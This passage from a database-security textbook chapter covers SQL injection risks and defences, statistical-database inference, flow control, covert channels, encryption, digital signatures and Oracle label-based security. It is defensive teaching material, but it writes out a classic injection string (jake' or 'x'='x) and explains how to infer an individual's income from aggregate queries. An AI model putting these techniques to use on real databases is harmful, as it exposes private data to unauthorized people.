show conversion of ‘98765432’ to ‘9876’, but the user’s intent would be to access the
URL and get sensitive information. The attacker can then retrieve useful informa-
tion from the database server—located at the URL that is passed as a parameter—
and send it to the Web server (that calls the TRANSLATE function).

4.2 Risks Associated with SQL Injection
SQL injection is harmful and the risks associated with it provide motivation for
attackers. Some of the risks associated with SQL injection attacks are explained
below.

■ Database Fingerprinting. The attacker can determine the type of database
being used in the backend so that he can use database-specific attacks that
correspond to weaknesses in a particular DBMS.

■ Denial of Service. The attacker can flood the server with requests, thus
denying service to valid users, or they can delete some data.

■ Bypassing Authentication. This is one of the most common risks, in which
the attacker can gain access to the database as an authorized user and per-
form all the desired tasks.

■ Identifying Injectable Parameters. In this type of attack, the attacker gath-
ers important information about the type and structure of the back-end
database of a Web application. This attack is made possible by the fact
that the default error page returned by application servers is often overly
descriptive.

■ Executing Remote Commands. This provides attackers with a tool to exe-
cute arbitrary commands on the database. For example, a remote user can
execute stored database procedures and functions from a remote SQL inter-
active interface.

■ Performing Privilege Escalation. This type of attack takes advantage of log-
ical flaws within the database to upgrade the access level.

4.3 Protection Techniques against SQL Injection
Protection against SQL injection attacks can be achieved by applying certain pro-
gramming rules to all Web-accessible procedures and functions. This section
describes some of these techniques.

Bind Variables (Using Parameterized Statements). The use of bind variables
(also known as parameters) protects against injection attacks and also improves per-
formance.

Consider the following example using Java and JDBC:

PreparedStatement stmt = conn.prepareStatement(
    "SELECT * FROM EMPLOYEE WHERE EMPLOYEE_ID = ? AND PASSWORD = ?");
stmt.setString(1, employee_id);   // bind the first placeholder to the user-supplied id
stmt.setString(2, password);      // bind the second placeholder to the user-supplied password
ResultSet rs = stmt.executeQuery();

Instead of embedding the user input into the statement, the input should be bound to a
parameter. In this example, the value of employee_id is bound to the first placeholder
(parameter index 1) and the value of password to the second placeholder (parameter index
2), rather than being concatenated directly into the SQL string.

Filtering Input (Input Validation). This technique can be used to remove escape
characters from input strings by using the SQL Replace function. For example, the
delimiter single quote (‘) can be replaced by two single quotes (‘’). Some SQL
Manipulation attacks can be prevented by using this technique, since escape charac-
ters can be used to inject manipulation attacks. However, because there can be a
large number of escape characters, this technique is not reliable.
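
As a small sketch of this technique (REPLACE is widely available, although its exact
behavior varies by DBMS; the :user_input placeholder below is illustrative and would be
supplied by the application):

SELECT REPLACE(:user_input, '''', '''''') FROM dual;
-- doubles every single quote in the input, so a value such as  jake' or 'x'='x
-- becomes  jake'' or ''x''=''x  and can no longer terminate the string literal
-- into which it is spliced.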

Function Security. Database functions, both standard and custom, should be
restricted, as they can be exploited in the SQL function injection attacks.

5 Introduction to Statistical Database Security
Statistical databases are used mainly to produce statistics about various popula-
tions. The database may contain confidential data about individuals, which should
be protected from user access. However, users are permitted to retrieve statistical
information about the populations, such as averages, sums, counts, maximums,
minimums, and standard deviations. The techniques that have been developed to
protect the privacy of individual information are beyond the scope of this text. We
will illustrate the problem with a very simple example, which refers to the relation
shown in Figure 3. This is a PERSON relation with the attributes Name, Ssn, Income,
Address, City, State, Zip, Sex, and Last_degree.

A population is a set of tuples of a relation (table) that satisfy some selection condi-
tion. Hence, each selection condition on the PERSON relation will specify a partic-
ular population of PERSON tuples. For example, the condition Sex = ‘M’ specifies
the male population; the condition ((Sex = ‘F’) AND (Last_degree = ‘M.S.’ OR
Last_degree = ‘Ph.D.’)) specifies the female population that has an M.S. or Ph.D.
degree as their highest degree; and the condition City = ‘Houston’ specifies the pop-
ulation that lives in Houston.

Statistical queries involve applying statistical functions to a population of tuples.
For example, we may want to retrieve the number of individuals in a population or
the average income in the population. However, statistical users are not allowed to
retrieve individual data, such as the income of a specific person. Statistical database
security techniques must prohibit the retrieval of individual data. This can be
achieved by prohibiting queries that retrieve attribute values and by allowing only
queries that involve statistical aggregate functions such as COUNT, SUM, MIN, MAX,
AVERAGE, and STANDARD DEVIATION. Such queries are sometimes called statistical
queries.

It is the responsibility of a database management system to ensure the confidential-
ity of information about individuals, while still providing useful statistical sum-
maries of data about those individuals to users. Provision of privacy protection of
users in a statistical database is paramount; its violation is illustrated in the follow-
ing example.

In some cases it is possible to infer the values of individual tuples from a sequence
of statistical queries. This is particularly true when the conditions result in a
population consisting of a small number of tuples.

Figure 3: The PERSON relation schema for illustrating statistical database security.
PERSON(Name, Ssn, Income, Address, City, State, Zip, Sex, Last_degree)

As an illustration, consider the
following statistical queries:

Q1: SELECT COUNT (*) FROM PERSON
WHERE <condition>;

Q2: SELECT AVG (Income) FROM PERSON
WHERE <condition>;

Now suppose that we are interested in finding the Income of Jane Smith, and we know
that she has a Ph.D. degree and that she lives in the city of Bellaire, Texas. We issue
the statistical query Q1 with the following condition:

(Last_degree=‘Ph.D.’ AND Sex=‘F’ AND City=‘Bellaire’ AND State=‘Texas’)

If we get a result of 1 for this query, we can issue Q2 with the same condition and
find the Income of Jane Smith. Even if the result of Q1 on the preceding condition is
not 1 but is a small number—say 2 or 3—we can issue statistical queries using the
functions MAX, MIN, and AVERAGE to identify the possible range of values for the
Income of Jane Smith.

The possibility of inferring individual information from statistical queries is
reduced if no statistical queries are permitted whenever the number of tuples in the
population specified by the selection condition falls below some threshold. Another
technique for prohibiting retrieval of individual information is to prohibit
sequences of queries that refer repeatedly to the same population of tuples. It is also
possible to introduce slight inaccuracies or noise into the results of statistical queries
deliberately, to make it difficult to deduce individual information from the results.
Another technique is partitioning of the database. Partitioning implies that records
are stored in groups of some minimum size; queries can refer to any complete group
or set of groups, but never to subsets of records within a group. The interested
reader is referred to the bibliography at the end of this chapter for a discussion of
these techniques.
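
A minimal sketch of the threshold idea for the Bellaire example above (the threshold of 10
is arbitrary, and a real system would enforce the check inside the DBMS rather than in the
query text):

SELECT CASE WHEN COUNT(*) >= 10 THEN AVG(Income) ELSE NULL END AS Avg_income
FROM   PERSON
WHERE  Last_degree = 'Ph.D.' AND Sex = 'F' AND City = 'Bellaire' AND State = 'Texas';
-- The average is released only when the selected population is large enough;
-- otherwise NULL is returned instead of a value that could expose an individual.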

6 Introduction to Flow Control
Flow control regulates the distribution or flow of information among accessible
objects. A flow between object X and object Y occurs when a program reads values
from X and writes values into Y. Flow controls check that information contained in
some objects does not flow explicitly or implicitly into less protected objects. Thus, a
user cannot get indirectly in Y what he or she cannot get directly in X. Active flow
control began in the early 1970s. Most flow controls employ some concept of security
class; the transfer of information from a sender to a receiver is allowed only if the
receiver’s security class is at least as privileged as the sender’s. Examples of a flow con-
trol include preventing a service program from leaking a customer’s confidential
data, and blocking the transmission of secret military data to an unknown classified
user.

A flow policy specifies the channels along which information is allowed to move.
The simplest flow policy specifies just two classes of information—confidential (C)
and nonconfidential (N)—and allows all flows except those from class C to class N.
This policy can solve the confinement problem that arises when a service program
handles data such as customer information, some of which may be confidential.
For example, an income-tax computing service might be allowed to retain a cus-
tomer’s address and the bill for services rendered, but not a customer’s income or
deductions.

Access control mechanisms are responsible for checking users’ authorizations for
resource access: Only granted operations are executed. Flow controls can be
enforced by an extended access control mechanism, which involves assigning a secu-
rity class (usually called the clearance) to each running program. The program is
allowed to read a particular memory segment only if its security class is as high as
that of the segment. It is allowed to write in a segment only if its class is as low as
that of the segment. This automatically ensures that no information transmitted by
the person can move from a higher to a lower class. For example, a military program
with a secret clearance can read only objects that are unclassified, confidential, or
secret, and can write only into objects that are secret or top secret.

Two types of flow can be distinguished: explicit flows, occurring as a consequence of
assignment instructions, such as Y := f(X1, …, Xn), and implicit flows, generated by
conditional instructions, such as: if f(Xm+1, …, Xn) then Y := f(X1, …, Xm).

Flow control mechanisms must verify that only authorized flows, both explicit and
implicit, are executed. A set of rules must be satisfied to ensure secure information
flows. Rules can be expressed using flow relations among classes and assigned to
information, stating the authorized flows within a system. (An information flow
from A to B occurs when information associated with A affects the value of infor-
mation associated with B. The flow results from operations that cause information
transfer from one object to another.) These relations can define, for a class, the set of
classes where information (classified in that class) can flow, or can state the specific
relations to be verified between two classes to allow information to flow from one to
the other. In general, flow control mechanisms implement the controls by assigning
a label to each object and by specifying the security class of the object. Labels are
then used to verify the flow relations defined in the model.

6.1 Covert Channels
A covert channel allows a transfer of information that violates the security policy.
Specifically, a covert channel allows information to pass from a higher classification
level to a lower classification level through improper means. Covert channels can be
classified into two broad categories: timing channels and storage channels. The
distinguishing feature between the two is that in a timing channel the information
is conveyed by the timing of events or processes, whereas storage channels do not
require any temporal synchronization, in that information is conveyed by accessing
system information or what is otherwise inaccessible to the user.

In a simple example of a covert channel, consider a distributed database system in
which two nodes have user security levels of secret (S) and unclassified (U). In order
for a transaction to commit, both nodes must agree to commit. They mutually can
only do operations that are consistent with the *-property, which states that in any
transaction, the S site cannot write or pass information to the U site. However, if
these two sites collude to set up a covert channel between them, a transaction
involving secret data may be committed unconditionally by the U site, but the S site
may do so in some predefined agreed-upon way so that certain information may be
passed from the S site to the U site, violating the *-property. This may be achieved
where the transaction runs repeatedly, but the actions taken by the S site implicitly
convey information to the U site. Measures such as locking prevent concurrent
writing of the information by users with different security levels into the same
objects, preventing the storage-type covert channels. Operating systems and distrib-
uted databases provide control over the multiprogramming of operations that
allows a sharing of resources without the possibility of encroachment of one pro-
gram or process into another’s memory or other resources in the system, thus pre-
venting timing-oriented covert channels. In general, covert channels are not a major
problem in well-implemented robust database implementations. However, certain
schemes may be contrived by clever users that implicitly transfer information.

Some security experts believe that one way to avoid covert channels is to prevent
programmers from gaining access to sensitive data that a program will process
after the program has been put into operation. For example, a programmer for a
bank has no need to access the names or balances in depositors’ accounts.
Programmers for brokerage firms do not need to know what buy and sell orders
exist for clients. During program testing, access to a form of real data or some sam-
ple test data may be justifiable, but not after the program has been accepted for reg-
ular use.

7 Encryption and Public
Key Infrastructures

The previous methods of access and flow control, despite being strong control
measures, may not be able to protect databases from some threats. Suppose we com-
municate data, but our data falls into the hands of a nonlegitimate user. In this situ-
ation, by using encryption we can disguise the message so that even if the
transmission is diverted, the message will not be revealed. Encryption is the conver-
sion of data into a form, called a ciphertext, which cannot be easily understood by
unauthorized persons. It enhances security and privacy when access controls are
bypassed, because in cases of data loss or theft, encrypted data cannot be easily
understood by unauthorized persons.

With this background, we adhere to the following standard definitions:6

■ Ciphertext: Encrypted (enciphered) data.

■ Plaintext (or cleartext): Intelligible data that has meaning and can be read or acted
upon without the application of decryption.

■ Encryption: The process of transforming plaintext into ciphertext.

■ Decryption: The process of transforming ciphertext back into plaintext.

6These definitions are from NIST (National Institute of Standards and Technology), from
http://csrc.nist.gov/publications/nistpubs/800-67/SP800-67.pdf.

Encryption consists of applying an encryption algorithm to data using some pre-
specified encryption key. The resulting data has to be decrypted using a
decryption key to recover the original data.

7.1 The Data Encryption and Advanced
Encryption Standards

The Data Encryption Standard (DES) is a system developed by the U.S. govern-
ment for use by the general public. It has been widely accepted as a cryptographic
standard both in the United States and abroad. DES can provide end-to-end
encryption on the channel between sender A and receiver B. The DES algorithm is a
careful and complex combination of two of the fundamental building blocks of
encryption: substitution and permutation (transposition). The algorithm derives its
strength from repeated application of these two techniques for a total of 16 cycles.
Plaintext (the original form of the message) is encrypted as blocks of 64 bits.
Although the key is 64 bits long, in effect the key can be any 56-bit number. After
questioning the adequacy of DES, the NIST introduced the Advanced Encryption
Standard (AES). This algorithm has a block size of 128 bits, compared with DES’s
64-bit block size, and can use keys of 128, 192, or 256 bits, compared with DES’s 56-bit
key. AES introduces more possible keys, compared with DES, and thus takes a much
longer time to crack.

7.2 Symmetric Key Algorithms
A symmetric key is one key that is used for both encryption and decryption. By
using a symmetric key, fast encryption and decryption is possible for routine use
with sensitive data in the database. A message encrypted with a secret key can be
decrypted only with the same secret key. Algorithms used for symmetric
key encryption are called secret-key algorithms. Since secret-key algorithms are
mostly used for encrypting the content of a message, they are also called content-
encryption algorithms.

The major liability associated with secret-key algorithms is the need for sharing the
secret key. A possible method is to derive the secret key from a user-supplied password
string by applying the same function to the string at both the sender and receiver; this
is known as a password-based encryption algorithm. The strength of the symmetric key
encryption depends on the size of the key used. For the same algorithm, encrypting
using a longer key is tougher to break than the one using a shorter key.

7.3 Public (Asymmetric) Key Encryption
In 1976, Diffie and Hellman proposed a new kind of cryptosystem, which they
called public key encryption. Public key algorithms are based on mathematical
functions rather than operations on bit patterns. They address one drawback of
symmetric key encryption, namely that both sender and recipient must exchange
the common key in a secure manner. In public key systems, two keys are used for
encryption/decryption. The public key can be transmitted in a non-secure way,
whereas the private key is not transmitted at all. These algorithms—which use two
related keys, a public key and a private key, to perform complementary operations
(encryption and decryption)—are known as asymmetric key encryption algo-
rithms. The use of two keys can have profound consequences in the areas of confi-
dentiality, key distribution, and authentication. The two keys used for public key
encryption are referred to as the public key and the private key. The private key is
kept secret, but it is referred to as a private key rather than a secret key (the key used
in conventional encryption) to avoid confusion with conventional encryption. The
two keys are mathematically related, since one of the keys is used to perform
encryption and the other to perform decryption. However, it is very difficult to
derive the private key from the public key.

A public key encryption scheme, or infrastructure, has six ingredients:

1. Plaintext. This is the data or readable message that is fed into the algorithm
as input.

2. Encryption algorithm. This algorithm performs various transformations
on the plaintext.

3. and 4. Public and private keys. These are a pair of keys that have been
selected so that if one is used for encryption, the other is used for decryp-
tion. The exact transformations performed by the encryption algorithm
depend on the public or private key that is provided as input. For example, if
a message is encrypted using the public key, it can only be decrypted using
the private key.

5. Ciphertext. This is the scrambled message produced as output. It depends
on the plaintext and the key. For a given message, two different keys will pro-
duce two different ciphertexts.

6. Decryption algorithm. This algorithm accepts the ciphertext and the
matching key and produces the original plaintext.

As the name suggests, the public key of the pair is made public for others to use,
whereas the private key is known only to its owner. A general-purpose public key
cryptographic algorithm relies on one key for encryption and a different but related
key for decryption. The essential steps are as follows:

1. Each user generates a pair of keys to be used for the encryption and decryp-
tion of messages.

2. Each user places one of the two keys in a public register or other accessible
file. This is the public key. The companion key is kept private.

3. If a sender wishes to send a private message to a receiver, the sender encrypts
the message using the receiver’s public key.


4. When the receiver receives the message, he or she decrypts it using the
receiver’s private key. No other recipient can decrypt the message because
only the receiver knows his or her private key.

The RSA Public Key Encryption Algorithm. One of the first public key schemes
was introduced in 1978 by Ron Rivest, Adi Shamir, and Len Adleman at MIT and is
named after them as the RSA scheme. The RSA scheme has since then reigned
supreme as the most widely accepted and implemented approach to public key
encryption. The RSA encryption algorithm incorporates results from number the-
ory, combined with the difficulty of determining the prime factors of a target. The
RSA algorithm also operates with modular arithmetic—mod n.

Two keys, d and e, are used for decryption and encryption. An important property is
that they can be interchanged. n is chosen as a large integer that is a product of two
large distinct prime numbers, a and b, with n = a × b. The encryption key e is a randomly
chosen number between 1 and n that is relatively prime to (a − 1) × (b − 1). The
plaintext block P is encrypted as P^e mod n. Because the exponentiation
is performed mod n, recovering the plaintext from P^e mod n is difficult.
However, the decryption key d is carefully chosen so that (P^e)^d mod n = P. The
decryption key d can be computed from the condition that d × e ≡ 1 mod ((a − 1) ×
(b − 1)). Thus, the legitimate receiver who knows d simply computes (P^e)^d mod n =
P and recovers P without having to factor n.
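The following minimal sketch (in Python) works through this arithmetic with deliberately tiny primes, a = 17 and b = 11; real RSA moduli are hundreds of digits long, and the particular numbers below are purely illustrative.

a, b = 17, 11
n = a * b                    # n = 187, the public modulus
phi = (a - 1) * (b - 1)      # (a - 1) * (b - 1) = 160

e = 7                        # encryption key: relatively prime to 160
d = pow(e, -1, phi)          # decryption key: d * e = 1 (mod 160), so d = 23

P = 88                       # a plaintext block, represented as an integer < n
C = pow(P, e, n)             # encryption:  P^e mod n = 11
assert pow(C, d, n) == P     # decryption: (P^e)^d mod n recovers P = 88

Anyone may learn (e, n) and encrypt, but recovering d requires knowing the factors a and b of n, which is why the difficulty of factoring underlies RSA's security.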

7.4 Digital Signatures
A digital signature is an example of using encryption techniques to provide authen-
tication services in electronic commerce applications. Like a handwritten signature,
a digital signature is a means of associating a mark unique to an individual with a
body of text. The mark should be unforgeable, and others should be able
to check that the signature comes from the originator.

A digital signature consists of a string of symbols. If a person’s digital signature were
always the same for each message, then one could easily counterfeit it by simply
copying the string of symbols. Thus, signatures must be different for each use. This
can be achieved by making each digital signature a function of the message that it is
signing, together with a timestamp. To be unique to each signer and counterfeit-
proof, each digital signature must also depend on some secret number that is
unique to the signer. Thus, in general, a counterfeit-proof digital signature must
depend on the message and a unique secret number of the signer. The verifier of the
signature, however, should not need to know any secret number. Public key tech-
niques are the best means of creating digital signatures with these properties.
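As a minimal sketch of this idea, the following Python fragment reuses the toy RSA parameters from the previous sketch (n = 187, e = 7, d = 23): the signature is computed from a digest of the message and a timestamp using the signer's private key, and anyone holding the public key can verify it. Real signature schemes use large keys and standardized hashing and padding.

import hashlib
import time

n, e, d = 187, 7, 23                     # toy public modulus and key pair

def digest(message: bytes, timestamp: float) -> int:
    # Reduce the message plus timestamp to an integer smaller than n.
    h = hashlib.sha256(message + repr(timestamp).encode()).digest()
    return int.from_bytes(h, "big") % n

def sign(message: bytes, timestamp: float) -> int:
    return pow(digest(message, timestamp), d, n)               # needs the private key d

def verify(message: bytes, timestamp: float, signature: int) -> bool:
    return pow(signature, e, n) == digest(message, timestamp)  # needs only the public key

t = time.time()
s = sign(b"Pay $100 to account 1234", t)
assert verify(b"Pay $100 to account 1234", t, s)

Because the timestamp enters the digest, signing the same message twice produces different signatures, and the verifier never needs the signer's secret.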

7.5 Digital Certificates
A digital certificate is used to combine the value of a public key with the identity of
the person or service that holds the corresponding private key into a digitally signed


statement. Certificates are issued and signed by a certification authority (CA). The
entity receiving this certificate from a CA is the subject of that certificate. Instead of
requiring each participant in an application to authenticate every user, third-party
authentication relies on the use of digital certificates.

The digital certificate itself contains various types of information. For example,
both the certification authority and the certificate owner information are included.
The following list describes all the information included in the certificate:

1. The certificate owner information, which is represented by a unique identi-
fier known as the distinguished name (DN) of the owner. This includes the
owner’s name, as well as the owner’s organization and other information
about the owner.

2. The certificate also includes the public key of the owner.

3. The date of issue of the certificate is also included.

4. The validity period is specified by ‘Valid From’ and ‘Valid To’ dates, which are
included in each certificate.

5. Issuer identifier information is included in the certificate.

6. Finally, the digital signature of the issuing CA for the certificate is included.
All the information listed is encoded through a message-digest function,
which creates the digital signature. The digital signature basically certifies
that the association between the certificate owner and public key is valid.
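For illustration only, the following Python sketch represents such a certificate as a record with the fields listed above and a CA signature computed over a message digest of those fields; the field values, and the reuse of the toy RSA parameters (n = 187, d = 23) as the CA's signing key, are hypothetical.

import hashlib
import json

certificate = {
    "subject_dn": "CN=Jane Doe, O=Example Corp, C=US",   # owner's distinguished name
    "subject_public_key": {"n": 187, "e": 7},            # owner's (toy) public key
    "issued_on": "2011-01-01",
    "valid_from": "2011-01-01",                          # validity period
    "valid_to": "2012-01-01",
    "issuer": "CN=Example Certification Authority",
}

# The CA computes a message digest over all the fields and signs it with its
# private key, certifying the binding between the owner and the public key.
fields = json.dumps(certificate, sort_keys=True).encode()
digest = int.from_bytes(hashlib.sha256(fields).digest(), "big") % 187
certificate["ca_signature"] = pow(digest, 23, 187)       # toy CA private exponent d = 23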

8 Privacy Issues and Preservation
Preserving data privacy is a growing challenge for database security and privacy
experts. From some perspectives, preserving data privacy may even require limiting
large-scale data mining and analysis. The most common technique for addressing
this concern is to avoid building mammoth central warehouses that act as a single
repository of vital information. Another possible measure is to intentionally
modify or perturb the data.

If all data were available at a single warehouse, violating only a single repository’s
security could expose all data. Avoiding central warehouses and using distributed
data mining algorithms minimizes the exchange of data needed to develop globally
valid models. By modifying, perturbing, and anonymizing data, we can also miti-
gate privacy risks associated with data mining. This can be done by removing iden-
tity information from the released data and injecting noise into the data. However,
by using these techniques, we should pay attention to the quality of the resulting
data in the database, which may undergo too many modifications. We must be able
to estimate the errors that may be introduced by these modifications.

Privacy is an important area of ongoing research in database management. It is
complicated due to its multidisciplinary nature and the issues related to the subjec-
tivity in the interpretation of privacy, trust, and so on. As an example, consider
medical and legal records and transactions, which must maintain certain privacy


requirements while they are being defined and enforced. Providing access control
and privacy for mobile devices is also receiving increased attention. DBMSs need
robust techniques for efficient storage of security-relevant information on small
devices, as well as trust negotiation techniques. Where to keep information related
to user identities, profiles, credentials, and permissions and how to use it for reliable
user identification remains an important problem. Because large-sized streams of
data are generated in such environments, efficient techniques for access control
must be devised and integrated with processing techniques for continuous queries.
Finally, the privacy of user location data, acquired from sensors and communica-
tion networks, must be ensured.

9 Challenges of Database Security
Considering the vast growth in volume and speed of threats to databases and infor-
mation assets, research efforts need to be devoted to the following issues: data qual-
ity, intellectual property rights, and database survivability. These are only some of
the main challenges that researchers in database security are trying to address.

9.1 Data Quality
The database community needs techniques and organizational solutions to assess
and attest the quality of data. These techniques may include simple mechanisms
such as quality stamps that are posted on Web sites. We also need techniques that
provide more effective integrity semantics verification and tools for the assessment
of data quality, based on techniques such as record linkage. Application-level recov-
ery techniques are also needed for automatically repairing incorrect data. The ETL
(extract, transform, load) tools widely used to load data in data warehouses are
presently grappling with these issues.

9.2 Intellectual Property Rights
With the widespread use of the Internet and intranets, legal and informational
aspects of data are becoming major concerns of organizations. To address these
concerns, watermarking techniques for relational data have been proposed. The
main purpose of digital watermarking is to protect content from unauthorized
duplication and distribution by enabling provable ownership of the content. It has
traditionally relied upon the availability of a large noise domain within which the
object can be altered while retaining its essential properties. However, research is
needed to assess the robustness of such techniques and to investigate different
approaches aimed at preventing intellectual property rights violations.

9.3 Database Survivability
Database systems need to operate and continue their functions, even with reduced
capabilities, despite disruptive events such as information warfare attacks. A DBMS,


in addition to making every effort to prevent an attack and detecting one in the
event of occurrence, should be able to do the following:

■ Confinement. Take immediate action to eliminate the attacker’s access to the
system and to isolate or contain the problem to prevent further spread.

■ Damage assessment. Determine the extent of the problem, including failed
functions and corrupted data.

■ Reconfiguration. Reconfigure to allow operation to continue in a degraded
mode while recovery proceeds.

■ Repair. Recover corrupted or lost data and repair or reinstall failed system
functions to reestablish a normal level of operation.

■ Fault treatment. To the extent possible, identify the weaknesses exploited in
the attack and take steps to prevent a recurrence.

The goal of the information warfare attacker is to damage the organization’s opera-
tion and fulfillment of its mission through disruption of its information systems.
The specific target of an attack may be the system itself or its data. While attacks that
bring the system down outright are severe and dramatic, they must also be well
timed to achieve the attacker’s goal, since attacks will receive immediate and con-
centrated attention in order to bring the system back to operational condition, diag-
nose how the attack took place, and install preventive measures.

To date, issues related to database survivability have not been sufficiently investi-
gated. Much more research needs to be devoted to techniques and methodologies
that ensure database system survivability.

10 Oracle Label-Based Security
Restricting access to entire tables or isolating sensitive data into separate databases is
a costly operation to administer. Oracle Label Security overcomes the need for such
measures by enabling row-level access control. It is available in Oracle Database 11g
Release 1 (11.1) Enterprise Edition at the time of writing. Each database table or
view has a security policy associated with it. This policy executes every time the
table or view is queried or altered. Developers can readily add label-based access
control to their Oracle Database applications. Label-based security provides an
adaptable way of controlling access to sensitive data. Both users and data have labels
associated with them. Oracle Label Security uses these labels to provide security.

10.1 Virtual Private Database (VPD) Technology
Virtual Private Database (VPD) is a feature of the Oracle Enterprise Edition that
adds predicates to user statements to limit their access in a manner transparent to
the user and the application. The VPD concept allows server-enforced, fine-grained
access control for a secure application.

VPD provides access control based on policies. These VPD policies enforce object-
level access control or row-level security. It provides an application programming


interface (API) that allows security policies to be attached to database tables or
views. Using PL/SQL, a host programming language used in Oracle applications,
developers and security administrators can implement security policies with the
help of stored procedures. VPD policies allow developers to remove access security
mechanisms from applications and centralize them within the Oracle Database.

VPD is enabled by associating a security “policy” with a table, view, or synonym. An
administrator uses the supplied PL/SQL package, DBMS_RLS, to bind a policy
function with a database object. When an object having a security policy associated
with it is accessed, the function implementing this policy is consulted. The policy
function returns a predicate (a WHERE clause) which is then appended to the user’s
SQL statement, thus transparently and dynamically modifying the user’s data access.
Oracle Label Security is a technique of enforcing row-level security in the form of a
security policy.
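The following Python sketch illustrates the idea only; it is not Oracle's DBMS_RLS interface, and the table, column, and session values are hypothetical. A policy function registered for a table returns a predicate, and the server appends that predicate to the user's statement before executing it.

policies = {}                            # table name -> policy function

def add_policy(table, policy_function):
    policies[table] = policy_function

def apply_policy(sql, table, session):
    # Consult the policy function for the accessed table and append its
    # predicate as an additional WHERE condition.
    predicate = policies[table](session)
    connector = " AND " if " where " in sql.lower() else " WHERE "
    return sql + connector + predicate

# Hypothetical row-level policy: users see only employees of their own department.
add_policy("EMPLOYEE", lambda session: "Dno = %d" % session["dept"])

session = {"user": "jsmith", "dept": 3}
print(apply_policy("SELECT Fname, Lname, Salary FROM EMPLOYEE", "EMPLOYEE", session))
# Prints: SELECT Fname, Lname, Salary FROM EMPLOYEE WHERE Dno = 3

In the real system the policy function is implemented as a stored PL/SQL procedure, and the rewriting is performed transparently by the database server.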

10.2 Label Security Architecture
Oracle Label Security is built on the VPD technology delivered in the Oracle
Database 11.1 Enterprise Edition. Figure 4 illustrates how data is accessed under
Oracle Label Security, showing the sequence of discretionary access control (DAC)
and label security checks.

The left part of the figure shows an application user in an Oracle
Database 11g Release 1 (11.1) session sending out an SQL request. The Oracle
DBMS checks the DAC privileges of the user, making sure that he or she has
SELECT privileges on the table. Then it checks whether the table has a Virtual
Private Database (VPD) policy associated with it to determine if the table is pro-
tected using Oracle Label Security. If it is, the VPD SQL modification (WHERE
clause) is added to the original SQL statement to find the set of accessible rows for
the user to view. Then Oracle Label Security checks the labels on each row, to deter-
mine the subset of rows to which the user has access (as explained in the next sec-
tion). This modified query gets processed, optimized, and executed.

10.3 How Data Labels and User Labels Work Together
A user’s label indicates the information the user is permitted to access. It also deter-
mines the type of access (read or write) that the user has on that information. A
row’s label shows the sensitivity of the information that the row contains as well as
the ownership of the information. When a table in the database has a label-based
access associated with it, a row can be accessed only if the user’s label meet certain
criteria defined in the policy definitions. Access is granted or denied based on the
result of comparing the data label and the session label of the user.

Compartments allow a finer classification of sensitivity of the labeled data. All data
related to the same project can be labeled with the same compartment.
Compartments are optional; a label can contain zero or more compartments.


[Figure 4: Oracle Label Security architecture. An Oracle user's SQL request for data is checked by the Oracle data server against discretionary (table-level) access control, then against any user-defined Virtual Private Database (VPD) policy, and finally against the label security policies that enforce row-level access control, before the data request is processed and executed. Source: Oracle (2007)]

Groups are used to identify organizations as owners of the data with corresponding
group labels. Groups are hierarchical; for example, a group can be associated with a
parent group.

If a user has a maximum level of SENSITIVE, then the user potentially has access to
all data having levels SENSITIVE, CONFIDENTIAL, and UNCLASSIFIED. This user has
no access to HIGHLY_SENSITIVE data. Figure 5 shows how data labels and user labels
work together to provide access control in Oracle Label Security.

As shown in Figure 5, User 1 can access the rows 2, 3, and 4 because his maximum
level is HS (Highly_Sensitive). He has access to the FIN (Finance) compartment,
and his access to group WR (Western Region) hierarchically includes group
WR_SAL (WR Sales). He cannot access row 1 because he does not have the CHEM
(Chemical) compartment. It is important that a user has authorization for all com-
partments in a row’s data label to be able to access that row. Based on this example,
user 2 can access both rows 3 and 4, and has a maximum level of S, which is less than
the HS in row 2. So, although user 2 has access to the FIN compartment, he can only
access the group WR_SAL, and thus cannot acces row 1.
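The read-access rule just described can be sketched as follows (plain Python with assumed data structures; Oracle's internal representation differs): a row is readable if the user's level dominates the row's level, the user holds every compartment in the row's label, and, when the row has a group, the user holds that group or one of its parent groups.

LEVELS = {"U": 0, "C": 1, "S": 2, "HS": 3}
GROUP_CHILDREN = {"WR": {"WR_SAL"}}      # group hierarchy: WR is the parent of WR_SAL

def groups_covered(group):
    # A group grants access to itself and, hierarchically, to its child groups.
    covered = {group}
    for child in GROUP_CHILDREN.get(group, set()):
        covered |= groups_covered(child)
    return covered

def can_read(user, row):
    level_ok = LEVELS[user["level"]] >= LEVELS[row["level"]]
    compartments_ok = row["compartments"] <= user["compartments"]
    user_groups = set()
    for g in user["groups"]:
        user_groups |= groups_covered(g)
    groups_ok = not row["groups"] or bool(row["groups"] & user_groups)
    return level_ok and compartments_ok and groups_ok

user1 = {"level": "HS", "compartments": {"FIN"}, "groups": {"WR"}}         # HS FIN : WR
row1  = {"level": "S",  "compartments": {"CHEM", "FIN"}, "groups": {"WR"}}
row2  = {"level": "HS", "compartments": {"FIN"}, "groups": {"WR_SAL"}}

print(can_read(user1, row1))   # False: user 1 lacks the CHEM compartment
print(can_read(user1, row2))   # True: level HS, compartment FIN, and WR covers WR_SAL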

[Figure 5: Data labels and user labels in Oracle. User labels: User 1 = HS FIN : WR; User 2 = S FIN : WR_SAL. Data labels: Row 1 = S CHEM, FIN : WR; Row 2 = HS FIN : WR_SAL; Row 3 = U FIN; Row 4 = C FIN : WR_SAL. A user label gives the maximum access level and all compartments to which the user has access; a data label gives the minimum access level required and all compartments to which the user must have access. Legend: HS = Highly Sensitive, S = Sensitive, C = Confidential, U = Unclassified. Source: Oracle (2007)]

11 Summary
In this chapter we discussed several techniques for enforcing database system security. We presented different threats to databases in terms of loss of integrity, availability, and confidentiality. We discussed the types of control measures to deal with these problems: access control, inference control, flow control, and encryption. In the introduction we covered various issues related to security, including data sensitivity and types of disclosures, providing security vs. precision in the result when a user requests information, and the relationship between information security and privacy.

Security enforcement deals with controlling access to the database system as a whole
and controlling authorization to access specific portions of a database. The former
is usually done by assigning accounts with passwords to users. The latter can be
accomplished by using a system of granting and revoking privileges to individual
accounts for accessing specific parts of the database. This approach is generally
referred to as discretionary access control (DAC). We presented some SQL com-
mands for granting and revoking privileges, and we illustrated their use with exam-
ples. Then we gave an overview of mandatory access control (MAC) mechanisms
that enforce multilevel security. These require the classifications of users and data
values into security classes and enforce the rules that prohibit flow of information
from higher to lower security levels. Some of the key concepts underlying the mul-
tilevel relational model, including filtering and polyinstantiation, were presented.
Role-based access control (RBAC) was introduced, which assigns privileges based
on roles that users play. We introduced the notion of role hierarchies, mutual exclu-
sion of roles, and row- and label-based security. We briefly discussed the problem of
controlling access to statistical databases to protect the privacy of individual infor-
mation while concurrently providing statistical access to populations of records. We
explained the main ideas behind the threat of SQL Injection, the methods in which
